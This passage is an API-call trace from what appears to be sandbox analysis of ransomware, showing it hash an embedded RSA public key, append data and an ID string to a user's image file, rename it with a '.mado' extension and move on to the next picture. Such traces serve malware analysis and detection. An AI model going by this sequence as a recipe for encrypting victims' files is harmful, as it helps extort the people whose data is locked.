(HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0207.186] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.186] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.186] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0207.187] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0207.187] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0207.187] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0207.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0207.187] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0207.187] GetLastError () returned 0x0 [0207.187] CryptDestroyHash (hHash=0x32ef238) returned 1 [0207.187] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0207.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0207.188] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0207.188] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0207.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0207.188] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0207.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0207.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x177a0) returned 0x3b87c98 [0207.188] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0207.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0207.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0207.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0207.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0207.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0207.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b87520 [0207.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79da0 [0207.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b87568 [0207.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79db8 [0207.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79de8 [0207.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79e30 [0207.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79e00 [0207.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0207.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0207.189] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0207.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0207.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79de8 | out: hHeap=0x2c0000) returned 1 [0207.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79e00 | out: hHeap=0x2c0000) returned 1 [0207.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79e30 | out: hHeap=0x2c0000) returned 1 [0207.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0207.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79e30 [0207.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0207.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79e00 [0207.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0207.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79de8 [0207.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0207.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b75a80 [0207.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0207.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0207.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0207.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b75b98 [0207.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0207.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0207.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a80 | out: hHeap=0x2c0000) returned 1 [0207.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79e00 | out: hHeap=0x2c0000) returned 1 [0207.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0207.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79de8 | out: hHeap=0x2c0000) returned 1 [0207.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0207.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0207.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79e30 | out: hHeap=0x2c0000) returned 1 [0207.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0207.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0207.190] GetCurrentThreadId () returned 0x600 [0207.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b817b0 [0207.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b7b808 [0207.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0207.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0207.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x32c64e8 [0207.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0207.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0207.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b818b8 [0207.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0207.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0207.190] GetCurrentThreadId () returned 0x600 [0207.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0207.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0207.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0207.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0207.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0207.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0207.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0207.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0207.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b819c0 [0207.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0207.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0207.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0207.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b81ac8 [0207.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0207.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79e30 [0207.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0207.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0207.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0207.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0207.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0207.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0207.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0207.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0207.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79de8 [0207.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0207.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0207.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0207.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0207.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0207.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0207.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0207.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79e00 [0207.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0207.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0207.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0207.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79dd0 [0207.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0207.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79e48 [0207.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0207.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0207.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0207.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79e18 [0207.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0207.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79e60 [0207.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0207.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0207.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0207.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0207.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0207.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0207.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79de8 | out: hHeap=0x2c0000) returned 1 [0207.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79de8 [0207.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0207.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0207.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79e30 | out: hHeap=0x2c0000) returned 1 [0207.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b75a80 [0207.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79e60 | out: hHeap=0x2c0000) returned 1 [0207.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0207.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0207.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b75cb0 [0207.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0207.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b75968 [0207.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79de8 | out: hHeap=0x2c0000) returned 1 [0207.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b7b950 [0207.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a80 | out: hHeap=0x2c0000) returned 1 [0207.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b81bd0 [0207.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b819c0 | out: hHeap=0x2c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81bd0 | out: hHeap=0x2c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75cb0 | out: hHeap=0x2c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79e18 | out: hHeap=0x2c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79e48 | out: hHeap=0x2c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79e00 | out: hHeap=0x2c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79dd0 | out: hHeap=0x2c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c64e8 | out: hHeap=0x2c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b818b8 | out: hHeap=0x2c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79db8 | out: hHeap=0x2c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87568 | out: hHeap=0x2c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81ac8 | out: hHeap=0x2c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75b98 | out: hHeap=0x2c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0207.194] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x17797, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.194] WriteFile (in: hFile=0x63c, lpBuffer=0x3b817b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b817b0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0207.194] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0207.194] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0207.195] CloseHandle (hObject=0x63c) returned 1 [0207.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xf0) returned 0x32b69d8 [0207.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8f0) returned 0x3b7b950 [0207.197] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\LJ8cwi.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\lj8cwi.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\LJ8cwi.png.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\lj8cwi.png.mado")) returned 1 [0207.198] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x394cc5f0, ftCreationTime.dwHighDateTime=0x1d5da71, ftLastAccessTime.dwLowDateTime=0x793b12f0, ftLastAccessTime.dwHighDateTime=0x1d5e6a3, ftLastWriteTime.dwLowDateTime=0x793b12f0, ftLastWriteTime.dwHighDateTime=0x1d5e6a3, nFileSizeHigh=0x0, nFileSizeLow=0x2ffd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NDgMcqKGv.gif", cAlternateFileName="NDGMCQ~1.GIF")) returned 1 [0207.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292eb8 [0207.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x136) returned 0x336fe98 [0207.198] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\NDgMcqKGv.gif") returned=".gif" [0207.198] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\NDgMcqKGv.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\ndgmcqkgv.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0207.199] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=12285) returned 1 [0207.199] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0207.201] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x2fd7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.201] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0207.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0207.202] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x2ffd, lpOverlapped=0x0) returned 1 [0207.203] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0207.203] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 